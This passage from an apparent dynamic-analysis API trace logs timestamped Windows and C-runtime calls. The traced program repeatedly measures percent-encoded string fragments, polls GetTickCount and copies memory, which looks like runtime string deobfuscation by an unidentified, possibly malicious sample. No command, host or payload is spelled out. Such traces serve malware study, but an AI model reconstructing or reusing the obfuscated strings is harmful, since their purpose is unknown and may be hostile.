lpSrcStr="\x81", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.245] SysStringLen (param_1="%59%69%75%43") returned 0xc [0101.246] SysStringLen (param_1="%74%65%4f%62") returned 0xc [0101.246] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.246] GetTickCount () returned 0x210d4cc [0101.246] SysStringLen (param_1="%41%6f%44%41") returned 0xc [0101.247] GetTickCount () returned 0x210d4cc [0101.247] SysStringLen (param_1="%1d%c2%9d%45%4b") returned 0xf [0101.247] GetTickCount () returned 0x210d4cc [0101.247] SysStringLen (param_1="%c3%ab%03%c3%9d%c2%a3") returned 0x15 [0101.247] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.247] GetTickCount () returned 0x210d4cc [0101.247] SysStringLen (param_1="%26%67%1e%17") returned 0xc [0101.247] GetTickCount () returned 0x210d4cc [0101.247] SysStringLen (param_1="%c3%91%12%c3%b4") returned 0xf [0101.248] GetTickCount () returned 0x210d4cc [0101.248] SysStringLen (param_1="%45%78%6f%63") returned 0xc [0101.249] GetTickCount () returned 0x210d4cc [0101.249] SysStringLen (param_1="%0f%c2%8e%c3%bd%5b") returned 0x12 [0101.249] GetTickCount () returned 0x210d4cc [0101.249] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0101.250] MulDiv (nNumber=1011, nNumerator=100, nDenominator=2050) returned 49 [0101.250] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.250] GetTickCount () returned 0x210d4cc [0101.250] SysStringLen (param_1="%5e%c2%83%6a%c2%8a") returned 0x12 [0101.250] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="©", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.250] SysStringLen (param_1="%3d%41%51%66") returned 0xc [0101.250] SysStringLen (param_1="%6e%65%45%6e") returned 0xc [0101.251] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ñ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.251] SysStringLen (param_1="%20%c3%b4%3e") returned 0xc [0101.251] SysStringLen (param_1="%1f%c3%bf%33%c3%9a") returned 0x12 [0101.252] SysStringLen (param_1="%c2%a6%55%c3%b3%c2%b5") returned 0x15 [0101.252] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¦", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.252] SysStringLen (param_1="%41%49%46%41") returned 0xc [0101.252] SysStringLen (param_1="%c2%b4%c3%be%68%76") returned 0x12 [0101.254] GetTickCount () returned 0x210d4dc [0101.254] SysStringLen (param_1="%c3%a0%c3%ad%60%3b") returned 0x12 [0101.254] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="à", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.254] GetTickCount () returned 0x210d4dc [0101.254] SysStringLen (param_1="%c2%b6%61%7f%c2%b2") returned 0x12 [0101.254] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.254] GetTickCount () returned 0x210d4dc [0101.254] SysStringLen (param_1="%63%c2%a0%c2%be%c3%81") returned 0x15 [0101.255] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x94", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.255] GetTickCount () returned 0x210d4dc [0101.255] SysStringLen (param_1="%c2%98%c2%ab%c2%80%36") returned 0x15 [0101.255] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.255] GetTickCount () returned 0x210d4dc [0101.255] SysStringLen (param_1="%67%41%41%64") returned 0xc [0101.257] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ø", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.257] GetTickCount () returned 0x210d4dc [0101.257] SysStringLen (param_1="%c2%99%52%59%0e") returned 0xf [0101.258] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ê", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.258] GetTickCount () returned 0x210d4dc [0101.258] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0101.259] MulDiv (nNumber=1021, nNumerator=100, nDenominator=2063) returned 49 [0101.259] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.259] GetTickCount () returned 0x210d4dc [0101.260] SysStringLen (param_1="%06%44%c3%9f%c3%89") returned 0x12 [0101.260] SysStringLen (param_1="%41%41%43%41") returned 0xc [0101.260] SysStringLen (param_1="%58%c2%83%4c%c2%b1") returned 0x12 [0101.260] SysStringLen (param_1="%41%34%47%41") returned 0xc [0101.261] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x98", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.261] SysStringLen (param_1="%79%73%51%55") returned 0xc [0101.261] SysStringLen (param_1="%63%74%64%48") returned 0xc [0101.261] SysStringLen (param_1="%c2%9d%4b%c2%a4%0e") returned 0x12 [0101.262] SysStringLen (param_1="%c3%b0%7f%71%2d") returned 0xf [0101.262] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ð", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.262] GetTickCount () returned 0x210d4dc [0101.262] SysStringLen (param_1="%c2%b6%5f%c2%82%3a") returned 0x12 [0101.263] GetTickCount () returned 0x210d4dc [0101.263] SysStringLen (param_1="%69%6e%6f%65") returned 0xc [0101.264] GetTickCount () returned 0x210d4dc [0101.264] SysStringLen (param_1="%44%c2%94%52%c2%b0") returned 0x12 [0101.264] GetTickCount () returned 0x210d4dc [0101.264] SysStringLen (param_1="%6c%42%51%62") returned 0xc [0101.264] GetTickCount () returned 0x210d4dc [0101.264] SysStringLen (param_1="%c2%a6%68%c2%9c%2b") returned 0x12 [0101.264] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¦", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.264] GetTickCount () returned 0x210d4dc [0101.264] SysStringLen (param_1="%c3%ba%08%c3%84%2f") returned 0x12 [0101.265] GetTickCount () returned 0x210d4dc [0101.265] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0101.266] MulDiv (nNumber=992, nNumerator=100, nDenominator=2069) returned 48 [0101.266] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.266] GetTickCount () returned 0x210d4dc [0101.266] SysStringLen (param_1="%c2%99%59%c3%b0%62") returned 0x12 [0101.266] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x99", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.266] SysStringLen (param_1="%65%6c%69%6e") returned 0xc [0101.266] SysStringLen (param_1="%30%42%51%59") returned 0xc [0101.267] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ç", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.267] SysStringLen (param_1="%2a%c2%bd%2e%c3%83") returned 0x12 [0101.267] SysStringLen (param_1="%c2%b9%6a%c2%a9%c2%8d") returned 0x15 [0101.268] SysStringLen (param_1="%41%49%48%41") returned 0xc [0101.279] SysStringLen (param_1="%c2%88%7a%c3%91%c2%93") returned 0x15 [0101.279] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x88", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.279] SysStringLen (param_1="%74%65%4f%62") returned 0xc [0101.279] SysStringLen (param_1="%c3%ae%65%50%61") returned 0xf [0101.279] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="î", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.279] GetTickCount () returned 0x210d4eb [0101.279] SysStringLen (param_1="%75%42%51%64") returned 0xc [0101.280] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¬", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.280] GetTickCount () returned 0x210d4eb [0101.280] SysStringLen (param_1="%c3%b6%c2%bf%38%c3%ac") returned 0x15 [0101.280] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ö", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.280] GetTickCount () returned 0x210d4eb [0101.280] SysStringLen (param_1="%c2%92%7a%c3%88%4a") returned 0x12 [0101.280] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x92", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.281] GetTickCount () returned 0x210d4eb [0101.281] SysStringLen (param_1="%30%41%67%4d") returned 0xc [0101.281] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ç", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.281] GetTickCount () returned 0x210d4eb [0101.281] SysStringLen (param_1="%65%74%65") returned 0x9 [0101.281] GetTickCount () returned 0x210d4eb [0101.282] SysStringLen (param_1="%c2%aa%c3%96%14%c3%93") returned 0x15 [0101.283] GetTickCount () returned 0x210d4eb [0101.283] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0101.285] MulDiv (nNumber=1029, nNumerator=100, nDenominator=2103) returned 49 [0101.285] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.285] GetTickCount () returned 0x210d4fb [0101.285] SysStringLen (param_1="%c2%b8%4d%1d%3b") returned 0xf [0101.286] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ë", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.286] SysStringLen (param_1="%75%41%51%65") returned 0xc [0101.286] SysStringLen (param_1="%6e%65%45%6e") returned 0xc [0101.286] SysStringLen (param_1="%c3%b9%65%41%6d") returned 0xf [0101.286] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ù", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.286] SysStringLen (param_1="%c2%b6%08%7c%c2%b2") returned 0x12 [0101.287] SysStringLen (param_1="%67%62%46%4c") returned 0xc [0101.287] SysStringLen (param_1="%c2%b4%c2%9f%29%c3%b9") returned 0x15 [0101.287] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="´", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.287] SysStringLen (param_1="%65%75%74%72") returned 0xc [0101.288] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x92", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.288] SysStringLen (param_1="%65%54%61%6c") returned 0xc [0101.288] GetTickCount () returned 0x210d4fb [0101.288] SysStringLen (param_1="%0e%c3%b5%09%21") returned 0xf [0101.289] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="±", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.289] GetTickCount () returned 0x210d4fb [0101.289] SysStringLen (param_1="%c2%82%71%5b%0f") returned 0xf [0101.290] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ñ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.290] GetTickCount () returned 0x210d4fb [0101.290] SysStringLen (param_1="%45%34%c2%a8%c2%b2%2b%c3%bf%5d%0a%c3%ad%c2%8c") returned 0x2d [0101.291] GetTickCount () returned 0x210d4fb [0101.291] SysStringLen (param_1="%67%41%41%64") returned 0xc [0101.291] GetTickCount () returned 0x210d4fb [0101.292] SysStringLen (param_1="%61%72%53%75") returned 0xc [0101.292] GetTickCount () returned 0x210d4fb [0101.292] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa270 | out: ppv=0xd6788fa270*=0x24adf97e528) returned 0x0 [0101.292] free (_Block=0x24ae139d9a0) [0101.293] MulDiv (nNumber=1001, nNumerator=100, nDenominator=2098) returned 48 [0101.293] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.293] GetTickCount () returned 0x210d4fb [0101.293] SysStringLen (param_1="%c3%a8%c2%b1%2b%c3%b2") returned 0x15 [0101.294] SysStringLen (param_1="%c2%b5%50%4e%02") returned 0xf [0101.294] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="µ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.294] SysStringLen (param_1="%c2%b8%66%75%60") returned 0xf [0101.294] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¸", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.294] SysStringLen (param_1="%6d%69%63%50") returned 0xc [0101.295] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.295] SysStringLen (param_1="%69%65%6c%64") returned 0xc [0101.295] SysStringLen (param_1="%6c%6c%65%68") returned 0xc [0101.295] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ó", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.296] SysStringLen (param_1="%c3%a8%c3%9f%48%2b") returned 0x12 [0101.296] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9b", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.296] SysStringLen (param_1="%c2%a8%c2%b5%2d%69") returned 0x12 [0101.296] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¨", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.296] GetTickCount () returned 0x210d4fb [0101.297] SysStringLen (param_1="%c2%b6%5f%c2%82%3a") returned 0x12 [0101.297] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¶", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.297] GetTickCount () returned 0x210d4fb [0101.297] SysStringLen (param_1="%7a%32%35%c2%bc") returned 0xf [0101.297] GetTickCount () returned 0x210d4fb [0101.297] SysStringLen (param_1="%c3%9f%2c%c3%b4%c2%90") returned 0x15 [0101.298] GetTickCount () returned 0x210d4fb [0101.298] SysStringLen (param_1="%c3%a9%7d%c2%8a%c2%bf") returned 0x15 [0101.298] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="é", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.298] GetTickCount () returned 0x210d4fb [0101.298] SysStringLen (param_1="%41%55%47%41") returned 0xc [0101.298] GetTickCount () returned 0x210d4fb [0101.298] SysStringLen (param_1="%52%65%66%65") returned 0xc [0101.299] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¥", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.299] GetTickCount () returned 0x210d4fb [0101.299] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0101.300] free (_Block=0x24ae146fda0) [0101.300] free (_Block=0x24ae14700a0) [0101.300] free (_Block=0x24ae146ffa0) [0101.301] free (_Block=0x24ae146faa0) [0101.301] free (_Block=0x24ae14702a0) [0101.302] free (_Block=0x24ae146fca0) [0101.303] free (_Block=0x24ae14701a0) [0101.303] MulDiv (nNumber=1014, nNumerator=100, nDenominator=2127) returned 48 [0101.303] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0101.303] GetTickCount () returned 0x210d50a [0101.303] SysStringLen (param_1="%68%61%72%73") returned 0xc [0101.303] memcpy (in: _Dst=0x24adf9bba38, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9bba38) returned 0x24adf9bba38 [0101.303] malloc (_Size=0x28) returned 0x24ae13c76e0 [0101.303] memcpy (in: _Dst=0x24adf9ba2fa, _Src=0x24ae1a0f808, _Size=0xc | out: _Dst=0x24adf9ba2fa) returned 0x24adf9ba2fa [0101.303] memcpy (in: _Dst=0x24adf9ba2f8, _Src=0x24adf9bba38, _Size=0x2 | out: _Dst=0x24adf9ba2f8) returned 0x24adf9ba2f8 [0101.304] free (_Block=0x24ae13c76e0) [0101.305] malloc (_Size=0x70) returned 0x24ae146fd20 [0101.305] GetTickCount () returned 0x210d50a [0101.307] malloc (_Size=0x28) returned 0x24ae13c7410 [0101.308] malloc (_Size=0x28) returned 0x24ae13c75c0 [0101.309] malloc (_Size=0x28) returned 0x24ae13c75f0 [0101.310] memcpy (in: _Dst=0x24adf9bbafe, _Src=0x24adf9bdb98, _Size=0x2 | out: _Dst=0x24adf9bbafe) returned 0x24adf9bbafe [0101.310] memcpy (in: _Dst=0x24adf9bbafc, _Src=0x24adf9bdaf8, _Size=0x2 | out: _Dst=0x24adf9bbafc) returned 0x24adf9bbafc [0101.310] memcpy (in: _Dst=0x24adf9bbafa, _Src=0x24adf9bda78, _Size=0x2 | out: _Dst=0x24adf9bbafa) returned 0x24adf9bbafa [0101.310] memcpy (in: _Dst=0x24adf9bbaf8, _Src=0x24adf9bb9a8, _Size=0x2 | out: _Dst=0x24adf9bbaf8) returned 0x24adf9bbaf8 [0101.310] free (_Block=0x24ae13c75f0) [0101.311] memcpy (in: _Dst=0x24adf9bd6f8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bd6f8) returned 0x24adf9bd6f8 [0101.311] malloc (_Size=0x28) returned 0x24ae13c7320 [0101.311] memcpy (in: _Dst=0x24adf9bbb5c, _Src=0x24adf9bd6f8, _Size=0x4 | out: _Dst=0x24adf9bbb5c) returned 0x24adf9bbb5c [0101.311] memcpy (in: _Dst=0x24adf9bbb58, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbb58) returned 0x24adf9bbb58 [0101.312] free (_Block=0x24ae13c7320) [0101.312] memcpy (in: _Dst=0x24adf9bd7f8, _Src=0x24adf9bbb5c, _Size=0x4 | out: _Dst=0x24adf9bd7f8) returned 0x24adf9bd7f8 [0101.312] malloc (_Size=0x28) returned 0x24ae13c7020 [0101.312] memcpy (in: _Dst=0x24adf9bda58, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bda58) returned 0x24adf9bda58 [0101.312] malloc (_Size=0x28) returned 0x24ae13c76b0 [0101.313] memcpy (in: _Dst=0x24adf9bb52c, _Src=0x24adf9bda58, _Size=0x4 | out: _Dst=0x24adf9bb52c) returned 0x24adf9bb52c [0101.313] memcpy (in: _Dst=0x24adf9bb528, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb528) returned 0x24adf9bb528 [0101.313] free (_Block=0x24ae13c76b0) [0101.313] memcpy (in: _Dst=0x24adf9bd9b8, _Src=0x24adf9bb52c, _Size=0x4 | out: _Dst=0x24adf9bd9b8) returned 0x24adf9bd9b8 [0101.313] malloc (_Size=0x28) returned 0x24ae13c70e0 [0101.313] malloc (_Size=0x28) returned 0x24ae13c7260 [0101.313] GetTickCount () returned 0x210d50a [0101.314] memcpy (in: _Dst=0x24adf9bdc38, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bdc38) returned 0x24adf9bdc38 [0101.314] malloc (_Size=0x28) returned 0x24ae13c7170 [0101.314] memcpy (in: _Dst=0x24adf9bbbbc, _Src=0x24adf9bdc38, _Size=0x4 | out: _Dst=0x24adf9bbbbc) returned 0x24adf9bbbbc [0101.314] memcpy (in: _Dst=0x24adf9bbbb8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbbb8) returned 0x24adf9bbbb8 [0101.315] free (_Block=0x24ae13c7170) [0101.315] memcpy (in: _Dst=0x24adf9bd538, _Src=0x24adf9bbbbc, _Size=0x4 | out: _Dst=0x24adf9bd538) returned 0x24adf9bd538 [0101.315] malloc (_Size=0x28) returned 0x24ae13c7500 [0101.315] malloc (_Size=0x28) returned 0x24ae13c7050 [0101.316] memcpy (in: _Dst=0x24adf9bd758, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bd758) returned 0x24adf9bd758 [0101.316] malloc (_Size=0x28) returned 0x24ae13c7140 [0101.317] memcpy (in: _Dst=0x24adf9bb4fc, _Src=0x24adf9bd758, _Size=0x4 | out: _Dst=0x24adf9bb4fc) returned 0x24adf9bb4fc [0101.317] memcpy (in: _Dst=0x24adf9bb4f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb4f8) returned 0x24adf9bb4f8 [0101.317] free (_Block=0x24ae13c7140) [0101.317] memcpy (in: _Dst=0x24adf9bda98, _Src=0x24adf9bb4fc, _Size=0x4 | out: _Dst=0x24adf9bda98) returned 0x24adf9bda98 [0101.317] malloc (_Size=0x28) returned 0x24ae13c7380 [0101.317] malloc (_Size=0x28) returned 0x24ae13c71d0 [0101.318] memcpy (in: _Dst=0x24adf9ac94c, _Src=0x24adf9bda98, _Size=0x4 | out: _Dst=0x24adf9ac94c) returned 0x24adf9ac94c [0101.318] memcpy (in: _Dst=0x24adf9ac94a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac94a) returned 0x24adf9ac94a [0101.318] memcpy (in: _Dst=0x24adf9ac946, _Src=0x24adf9bd538, _Size=0x4 | out: _Dst=0x24adf9ac946) returned 0x24adf9ac946 [0101.318] memcpy (in: _Dst=0x24adf9ac944, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac944) returned 0x24adf9ac944 [0101.318] memcpy (in: _Dst=0x24adf9ac940, _Src=0x24adf9bd9b8, _Size=0x4 | out: _Dst=0x24adf9ac940) returned 0x24adf9ac940 [0101.318] memcpy (in: _Dst=0x24adf9ac93e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac93e) returned 0x24adf9ac93e [0101.318] memcpy (in: _Dst=0x24adf9ac93a, _Src=0x24adf9bd7f8, _Size=0x4 | out: _Dst=0x24adf9ac93a) returned 0x24adf9ac93a [0101.318] memcpy (in: _Dst=0x24adf9ac938, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac938) returned 0x24adf9ac938 [0101.319] free (_Block=0x24ae13c71d0) [0101.319] SysStringLen (param_1="%61%64%67%71") returned 0xc [0101.319] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484c60 [0101.319] memcpy (in: _Dst=0x24adf9bbbe8, _Src=0x24ae1484c60, _Size=0x8 | out: _Dst=0x24adf9bbbe8) returned 0x24adf9bbbe8 [0101.319] free (_Block=0x24ae1484c60) [0101.319] malloc (_Size=0x2e0) returned 0x24ae13903c0 [0101.319] GetTickCount () returned 0x210d51a [0101.319] malloc (_Size=0x20) returned 0x24ae13c7080 [0101.319] malloc (_Size=0x288) returned 0x24ae148dac0 [0101.319] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139ce50 [0101.319] realloc (_Block=0x24ae13c7080, _Size=0x40) returned 0x24ae1480a50 [0101.319] GetTickCount () returned 0x210d51a [0101.319] realloc (_Block=0x24ae139ce50, _Size=0x280) returned 0x24ae148dd50 [0101.319] malloc (_Size=0x508) returned 0x24ae1487e40 [0101.319] GetTickCount () returned 0x210d51a [0101.319] realloc (_Block=0x24ae1480a50, _Size=0x80) returned 0x24ae1482b10 [0101.319] GetTickCount () returned 0x210d51a [0101.319] realloc (_Block=0x24ae148dd50, _Size=0x500) returned 0x24ae1488350 [0101.320] GetTickCount () returned 0x210d51a [0101.320] malloc (_Size=0xa08) returned 0x24ae13b3db0 [0101.320] GetTickCount () returned 0x210d51a [0101.320] realloc (_Block=0x24ae1482b10, _Size=0x100) returned 0x24ae1474000 [0101.320] GetTickCount () returned 0x210d51a [0101.320] realloc (_Block=0x24ae1488350, _Size=0xa00) returned 0x24ae13b51d0 [0101.320] GetTickCount () returned 0x210d51a [0101.320] GetTickCount () returned 0x210d51a [0101.320] GetTickCount () returned 0x210d51a [0101.320] GetTickCount () returned 0x210d51a [0101.320] malloc (_Size=0x1408) returned 0x24ae1489a90 [0101.320] GetTickCount () returned 0x210d51a [0101.320] realloc (_Block=0x24ae1474000, _Size=0x200) returned 0x24ae13b9190 [0101.320] GetTickCount () returned 0x210d51a [0101.320] GetTickCount () returned 0x210d51a [0101.320] GetTickCount () returned 0x210d51a [0101.320] realloc (_Block=0x24ae13b51d0, _Size=0x1400) returned 0x24ae13c5b90 [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] GetTickCount () returned 0x210d51a [0101.321] malloc (_Size=0x2808) returned 0x24ae139eed0 [0101.322] GetTickCount () returned 0x210d51a [0101.323] GetTickCount () returned 0x210d51a [0101.324] GetTickCount () returned 0x210d51a [0101.326] GetTickCount () returned 0x210d51a [0101.327] GetTickCount () returned 0x210d51a [0101.329] GetTickCount () returned 0x210d51a [0101.330] GetTickCount () returned 0x210d51a [0101.332] GetTickCount () returned 0x210d52a [0101.333] GetTickCount () returned 0x210d52a [0101.335] GetTickCount () returned 0x210d52a [0101.336] GetTickCount () returned 0x210d52a [0101.338] GetTickCount () returned 0x210d52a [0101.339] GetTickCount () returned 0x210d52a [0101.340] malloc (_Size=0x28) returned 0x24ae13c7170 [0101.340] malloc (_Size=0x28) returned 0x24ae13c7650 [0101.340] malloc (_Size=0x28) returned 0x24ae13c73b0 [0101.340] memcpy (in: _Dst=0x24adf9bb49e, _Src=0x24adf9bdc78, _Size=0x2 | out: _Dst=0x24adf9bb49e) returned 0x24adf9bb49e [0101.340] memcpy (in: _Dst=0x24adf9bb49c, _Src=0x24adf9bd4d8, _Size=0x2 | out: _Dst=0x24adf9bb49c) returned 0x24adf9bb49c [0101.340] memcpy (in: _Dst=0x24adf9bb49a, _Src=0x24adf9bd678, _Size=0x2 | out: _Dst=0x24adf9bb49a) returned 0x24adf9bb49a [0101.340] memcpy (in: _Dst=0x24adf9bb498, _Src=0x24adf9bd618, _Size=0x2 | out: _Dst=0x24adf9bb498) returned 0x24adf9bb498 [0101.341] free (_Block=0x24ae13c73b0) [0101.341] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Þ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.341] memcpy (in: _Dst=0x24adf9bd5f8, _Src=0xd6788fbb30, _Size=0x4 | out: _Dst=0x24adf9bd5f8) returned 0x24adf9bd5f8 [0101.341] malloc (_Size=0x28) returned 0x24ae13c7080 [0101.341] memcpy (in: _Dst=0x24adf9bb58c, _Src=0x24ae1a0f808, _Size=0xc | out: _Dst=0x24adf9bb58c) returned 0x24adf9bb58c [0101.341] memcpy (in: _Dst=0x24adf9bb588, _Src=0x24adf9bd5f8, _Size=0x4 | out: _Dst=0x24adf9bb588) returned 0x24adf9bb588 [0101.341] free (_Block=0x24ae13c7080) [0101.342] malloc (_Size=0x70) returned 0x24ae14701a0 [0101.342] GetTickCount () returned 0x210d52a [0101.342] malloc (_Size=0x28) returned 0x24ae13c75f0 [0101.342] malloc (_Size=0x28) returned 0x24ae13c7680 [0101.342] malloc (_Size=0x28) returned 0x24ae13c76b0 [0101.342] memcpy (in: _Dst=0x24adf9be8de, _Src=0x24adf9bdbf8, _Size=0x2 | out: 